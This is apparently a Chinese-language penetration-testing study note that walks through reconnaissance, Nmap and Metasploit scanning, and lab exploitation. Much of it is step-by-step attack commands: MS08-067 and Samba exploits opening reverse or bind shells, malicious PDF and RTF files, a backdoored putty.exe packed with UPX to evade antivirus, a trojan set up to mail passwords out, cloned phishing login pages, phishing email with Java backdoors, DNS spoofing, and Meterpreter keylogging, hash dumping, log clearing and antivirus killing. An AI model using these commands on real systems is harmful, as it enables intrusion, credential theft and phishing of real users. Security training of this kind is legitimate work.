渗透测试

pantester

渗透测试是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制错失,去的访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式


攻击前(网络踩点、网络扫描、网络查点)

攻击中(利用漏洞信息进行渗透攻击,获取权限)

攻击后(后渗透维持攻击,文件拷贝,木马植入,痕迹 擦除)


黑盒测试

对渗透攻击目标网络内部拓扑一无所知,完全模拟真实黑客有组织有步骤的渗透入侵过程


特点:花费时间长

渗透测试者需要有较高的技术能力


白盒测试

对渗透攻击目标网络非常了解,以最小的代价进行系统安全探测


特点:节省时间

无法有效测试客户的内部安全应急响应程序


灰盒测试

更深入全面


渗透流程

前期交互阶段(渗透测试范围、目标、限制条件、服务合同)(收集客户需求、准备测试计划、定义测试范围、定义业务目标)

情报搜集阶段(公开信息查询、google hacking、社会工程学、网络踩点、扫描检测、被动监听、服务查点)

威胁建模阶段(情报分析、攻击路径)

漏洞分析阶段(结合安全漏洞扫描结果和服务查点信息、针对关键系统服务进行漏洞挖掘)

渗透攻击阶段(利用目标漏洞,入侵系统,获得访问权限)

后渗透攻击阶段(根据目标业务经营情况,挖掘出最有价值的信息和资产)

报告阶段(想客户提高安全渗透报告)


漏洞分析与利用Exploit


安全漏洞生命周期

安全漏洞研究与挖掘

Exploit代码开发与测试

安全漏洞/Exploit代码限于封闭团队

安全漏洞/Exploit代码开始扩散

攻击工具/恶意程序出现并传播

Exploit/攻击工具/恶意程序大规模传播并危害互联网

Exploit/攻击工具/恶意程序逐渐消亡


安全漏洞公共资源库(CNNVD,CNVD,SCAP,CVE,NVD,SECURTYFOCUS,OSVDB,WOOYUN)

 

安全攻击流程

踩点,扫描,攻击,维持访问


基础入门

环境搭建

情报收集

web服务渗透

网络服务渗透

客户端渗透

社会工程学

移动环境渗透

强大的Meterpreter


信息收集

漏洞评定工具

攻击工具

用户提权

维护登陆

逆向工程

RFID工具

压力测试

取证

报告工具

服务

杂项


BT5:操作系统,包含各种各样不同作者编写的黑客攻击(安全审计)工具,从渗透前期到后期全部涉及 

Metasploit:渗透攻击平台(软件套餐),包含整个渗透攻击流程的大部分工具,采用统一的攻击流程,攻击语法,模板化


渗透攻击模块、攻击载荷、辅助模块、后渗透攻击模块

模块--Metaspoit框架对外提供的最核心的渗透功能实现代码

插件--用于集成外部的安全攻击,例如Nessus(漏洞扫描器),Nmap(端口扫描器)


组成

Aux辅助:模块主要完成信息搜集

Exploits模块:进行渗透攻击

Post后渗透攻击模块:进行主机控制与拓展攻击


msfconsole接口 控制台终端

msfgui 图形化界面

msfcli 命令行程序


渗透测试前期

footprinting 网络踩点

网络踩点技术:DNS与IP查询、web信息搜索与挖掘、网络拓扑侦查

收集目标系统的域名、IP地址、拓扑、联系信息等外围信息

scanning 网络扫描

探测目标活跃主机(即IP)、端口信息(开放的服务)、系统类型和服务版本、相关的安全漏洞

enumeration 网络查点

对探测出来的服务进行进一步的攻击探测


DNS/IP踩点

whois域名注册信息查询

nslookup与dig域名查询

IP2Location地理位置查询

netcraft实现信息查询服务

IP2Domain反查域名


进入unity模式

whois 用来查询域名注册信息库的工具,如果开启域名信息保护,无法看到详细信息 查不到IP

nslookup 查询DNS服务器上的Cache非权威解答

set type=A

dig 可以指定具体的域名服务器,得到更权威的解析

dig @ns.watson.ibm.com testfire.net


IP2location 得到域名对应的IP信息,还可以得到具体的地理位置和其他私密信息

maxmind.com


netcraft实现信息查询服务

可以查询网站和服务器更详细的信息

查询域名相关的子域名

searchdns.netcraft.com


IP2Domain反查域名

可以查询哪些域名指向同一个IP地址

7c.com


搜索引擎踩点

Google Hacking技术

工具推荐

SiteDigger  (http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx#)

search diggity

搜索网站的目录结构

www.gfsswy.com

parent directory site:testfire.net

检索特定类型的文件

site:testfire.net filetype:xls

搜索网站中的E-mail地址

use auxiliary/gather/search_email_collector

搜索易存在SQL注入点的页面


拓扑路径踩点

traceroute (用icmp来追踪)

tcptraceroute (利用SYN的同步位对每跳进行握手,可以穿透防火墙)


网络扫描描述


主机描述                           找出网段内活跃主机

ICMP ping 对目标系统进行echo request 请求探测 最常规的ping工具,容易被防火墙屏蔽

-c 次数 -s 数据包大小

arpping 通过arp请求来实现探测,一般防火墙没法过滤arp协议


在arping的基础上,加入网段扫描支持,通过ifconfig命令查看接口信息,然后调用具体的网卡来执行arp扫描

arp-scan --interface=eth2 10.10.10.0/24


nbtscan 得到 IP,MAC,netbios主机名信息

nbtscan 10.10.10.0/24

Nmap 世界上最流行功能最强大的网络扫描工具

nmap -sn 10.10.10.0/24 扫描MAC,IP信息,不做端口扫描


nmap 扫描选项(用于指定扫描的方式) 扫描目标(用于指定IP地址)

主机发现模块 局域网内部ARP扫描器,只能扫描同一局域网内部主机  arp_sweep

msfconsole

use auxiliary/scanner/discover/arp_sweep

show options

set RHOSTS 10.10.10.0/24

set THREADS 10

run

back 退出

exit 回到根目录


端口扫描                           找出主机上所开放的网络服务

Metaspolit端口扫描模块

通过tcp syn做端口扫描,速度较快且不易被发现,可以有其他选项

use auxiliary/scanner/portscan/syn

show options

set RHOSTS 10.10.10.129 

set THREADS 20

run


Nmap实现端口、服务、系统检测

nmap -sS -Pn 10.10.10.129 通过ICP SYN方式扫描,并且扫描过程中不用进行ICMP echo探测,能扫描到IP、端口、服务信息、操作系统大概的类型

nmap -sV -Pn 10.10.10.129 在上面的基础上可得到更详细的软件服务版本信息 此系统提供服务对应的软件版本信息

nmap -sV 10.10.10.129 能扫描到IP、端口、服务信息、操作系统大概的类型,此系统提供服务对应的软件版本信息

nmap -A 10.10.10.129 能扫描到IP、端口、服务信息、操作系统类型,此系统提供服务对应的软件版本信息


操作系统/网络服务辨识    识别主机安装的操作系统类型与开放网络服务类型,以选择不同的渗透攻击代码及配置

xprobe2 10.10.10.129 根据不同协议的反馈协议,综合得出操作系统信息

nmap -O 10.10.10.129 除了得到操作系统信息,也能扫描到IP、MAC、PORT、服务信息,没法看到服务对应的软件版本


漏洞扫描                           找出主机/网络服务上所存在的安全漏洞,作为破解通道

Nessus漏洞扫描器

安装方式

到Nessuss官网下载软件版本,根据BT5的版本下载
http://www.tenable.com/products/nessus/select-your-operating-system
Nessus-6.2.1-ubuntu910_i386.deb

将其复制到BT5桌面下(直接拖拽),进入路径并进行安装
cd Desktop/
dpkg -i Nessus-6.2.1-ubuntu910_i386.deb

到官网申请Nessus激活码
http://www.tenable.com/products/nessus-home

添加Nessus管理员用户名和密码
/opt/nessus/sbin/nessuscli adduser cisco
Login password:cisco
Login password(again):cisco

通过激活码激活Nessus,并且开始漏洞插件在线下载
/opt/nessus/sbin/nessuscli fetch --register D2E2-F637-F405-0210-3938
等待升级完成后
/opt/nessus/sbin/etc/init.d/nessusd restart

通过浏览器输入https://localhost:8834访问Nessus,输入帐号密码cisco/cisco,登陆


search ms08_067

show payloads

use exploit/windows/smb/ms08_067_netapi 查看此渗透模块所对应的攻击载荷 

set PAYLOAD generic/shell_reverse_tcp

set RHOST 10.10.10.130 设置目标IP

set LHOST 10.10.10.128 设置本地IP

set LPORT 5000 设置本地端口,此端口为渗透后靶机回连端口

set TARGET 5  系统操作代码

show options

exploit

OpenVAS漏洞扫描器


网络查点
旗标抓取
网络服务查点
telnet 网络查点
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 10.10.10.0/24
set THREADS 100
show options
run

ssh 网络查点
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 10.10.10.0/24
set THREADS 100
show options
run
ssh 口令破解
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set USERNAME root
set PASS_FILE /root/words.txt
set THREADS 50
run

网络服务渗透攻击

MS12-020
一般开启了3389端口RDP服务远程桌面服务的WIN XP和WIN server 2003都有此漏洞
DOS下开启win server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

MS08-067
攻击者利用受害者主机默认开发的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用Server服务的一个函数,并破坏程序栈缓冲区,获得远程代码执行权限,从而完全控制主机

Samba(Linux服务)
search samba      查找针对samba服务漏洞相关渗透攻击模块
use exploit/muliti/samba/usermap_script      调用特定的渗透攻击模块
set PAYLOAD cmd/unix/bind_netcat      使用netcat攻击载荷,渗透成功后由其执行shell,并通过netcat绑定在一个监听端口上
set RHOST 10.10.10.254      设置目标主机IP
show options
exploit     执行漏洞渗透

客户端渗透攻击

ADOBE阅读器渗透攻击
use exploit/windows/fireformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 10.10.10.128
set LPORT 8443
set FILENAME 1.pdf
exploit
[*] Creating '1.pdf' file...
[*] Generated output file /root/.msf4/data/exploits/1.pdf
将文件拖入靶机当中
back
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 10.10.10.128
exploit

OFFICE2003渗透攻击
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set FILENAME 1.rtf
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 10.10.10.128
exploit
将文件拖入靶机中
back use exploit/multi/handler
rexploit

社会工程学渗透攻击
伪装木马渗透攻击
Meterpreter后门攻击
将文件放入攻击机中
在shell 中写入以下命令
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -C 5
将文件拷到靶机上
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.128
set LPORT 80
exploit
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.128
set LPORT 80
exploit
在靶机上安装杀毒软件,可以通过UPX来实现加强免杀
将UPX软件放在统一目录下,然后执行免杀 upx-3.07-i386_linux
upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe
将软件放在靶机上,再次测试杀毒

冰河木马后门攻击(灰鸽子)
1、下载冰河木马到Windows server 2003
G_Client为客户端,在攻击机本地打开,用来为靶机的后门程序做控制设置
G_Server为服务端,在靶机上打开,一般通过捆绑方式绑定到其他软件
2、在攻击机上开启G_Client.exe
设置访问口令(必须设置,不然没法访问靶机)其他为默认
设置关联启动(自我保护),当冰河后门被关闭之后,通过txt或者exe文件复活
设置邮件通知,当地址发生变动时,发送邮件,将系统,密码等信息发送过来
点击确定,保存配置
3、将攻击机上的G_Server.exe复制到靶机上
双击病毒,并观察后台任务管理器
4、在攻击机上开启G_Client.exe并远程控制靶机
扫描靶机(定义IP地址范围)可以访问靶机
可以通过命令控制台对肉鸡进行各种控制

网站钓鱼渗透攻击

BT5虚拟环境实现
启动社会工程学攻击集
cd /pentest/exploits/set
./set
选择网页攻击 选2
选择帐号窃取 选3
选择克隆站点 选2
开始克隆 http://10.10.10.129/signin.html
靶机测试 帐号:admin  密码 dvssc@admin01
帐号获取

Kali Linux(最新版的BT)真实环境实现  不要startx
VMWARE模式:桥接模式/NAT模式

修改IP和路由(一次性)
设置IP地址:ipconfig eth0 10.1.1.10 netmask 255.255.255.0 up
添加默认路由:route add default gw 10.1.1.254
修改IP和路由
vim /etc/network/interface
auto eth0
allow-hotplug eth0
address 10.1.1.212
netmask 255.255.255.0
gateway 10.1.1.254
添加路由转发功能
vim /etc/sysctl.conf
net.ipv4.ip_forward=1
reboot

一、域名劫持(域名欺骗)ettercap
1.启动ettercap  ettercap -G
2.主机扫描
3.ARP欺骗
4.流量抓包
5.DNS欺骗
find \ -name "etter.dns"
vim /usr/share/ettercap/etter.dns

二、网站克隆 
cd /usr/share/set
./set 启动set
选项1.社会工程学攻击
选项2.网页欺骗攻击
选项3.网页克隆攻击
选项2.单个站点克隆
输入攻击机的地址
输入克隆的网页地址
开始克隆网页(开启apache)

三、在靶机上测试效果
靶机能够ping同攻击者的IP地址
靶机浏览器输入攻击者的IP地址
靶机上输入用户名和密码
点击登录后会进入真实的网页
打开攻击者缓存文件查看用户密码 放在(/var/www 中)
引入arp和dns欺骗,在靶机浏览器上输入真实域名

邮件钓鱼
kali linux实现

发伪造网页连接(结合上面网站钓鱼来进行帐号窃取)
vim /usr/share/set/config/set_config
将WEBATTACK_EMAIL选项改为on
选1 输入收件人邮箱地址
选1 输入发送人邮箱地址
写入邮件主题
输入邮件密码
yes -- subject -- h  --body --END结束

发伪造网页连接java后门程序(植入后门)
攻击机需要调用谷歌邮箱,需要,并且允许呗set工具调用

攻击机配置
启动社会工程学工具集
选项1:社工国内国际
选项2:网页攻击
选项1:JAVA注入
选项2:网页克隆
输入攻击机IP地址
选项2:植入插件并克隆
选项1(shikata):选择后门程序
选择监听端口
执行加密
调用邮件发送
通过谷歌邮箱发送给QQ邮箱
邮件发送成功等待肉鸡上线

只支持旧版的IE浏览器
肉鸡配置
自带IE浏览器,安装Java环境并启用
打开QQ邮箱
用IE打开邮箱内的网站(此时用户点击信任java,则马上中招)

发伪造网页连接结合带有木马附件(盗号并植入后门)

自动化渗透攻击
在msf中输入db_nmap -T aggressive -sV -n -o -v 10.1.1.x   采用最快的时间扫描,判断提供的服务和软件版本,不做DNS解析,判断操作系统,显示扫描结果
msf调用nmap,扫描主机,并将扫描的内容存储进入数据库
hosts 查看扫描到的主机
services 扫描得到的服务
db_autopwn -t -p -e -i 10.1.1.x   显示所有模块 加载模块攻击 执行攻击 指定刚扫描的主机
自动攻击加载攻击模块针对服务漏洞进行攻击

meterpreter (后渗透攻击)
常用命令
0.session -l       #查看会话
1.session -i 1 #连接回话
2.getuid          #查看当前用户
3.sysinfo        #查看系统信息
4.run hashdump   #备份系统账户哈希值,后期可以用暴力破解
一般我们的密码放在C:\Windows\System32\config\SAM 文件内
5.ps                #查看进程,找到管理员用的进程
6.migrate xxx  #迁移到管理员进程,一般我们选取explorer.exe的PID值
7.keyscan_start  #抓取键盘操作
8.keyscan_dump  #显示键盘操作
9.keyscan_stop
10.run getgui -e      #开启远程桌面(电脑--属性--系统属性--远程)3389端口
11.run getgui -u pinginglab -p cisco #添加帐号密码
直接输入shell 可以进入cmd 的dos命令
net user 用户名 密码
net localgroup administrator  用户名 /add
(计算机管理--本地用户查看)
12.在shell中 rdesktop 10.10.10.x:3389
13.用容笑LC破解词典L0phtCrack v5.02
网络管理员必备工具,它可以用来检测windows、UNIX用户是否使用不安全的密码
14.清除所有操作日志,反取证
clearv

用help查看命令

攻击模块根据漏洞拿到shell,后渗透模块是干坏事的

meterpreter 是一个内存攻击进程,好处
1.不创建进程(使用内存注入方式)
2.它是一个解析器加载各种攻击命令
3.工作在被攻击进程的上下文中
4.通信是加密的(TLV协议),可以躲避IDS
5.没有硬盘写入操作
6.使用通信方式是信道模式,可以同时和几个信道工作,支持多信道
7.支持扩展编写

关闭杀毒软件
run killav 可能导致目标机器蓝屏死机



你可能感兴趣的:(渗透测试)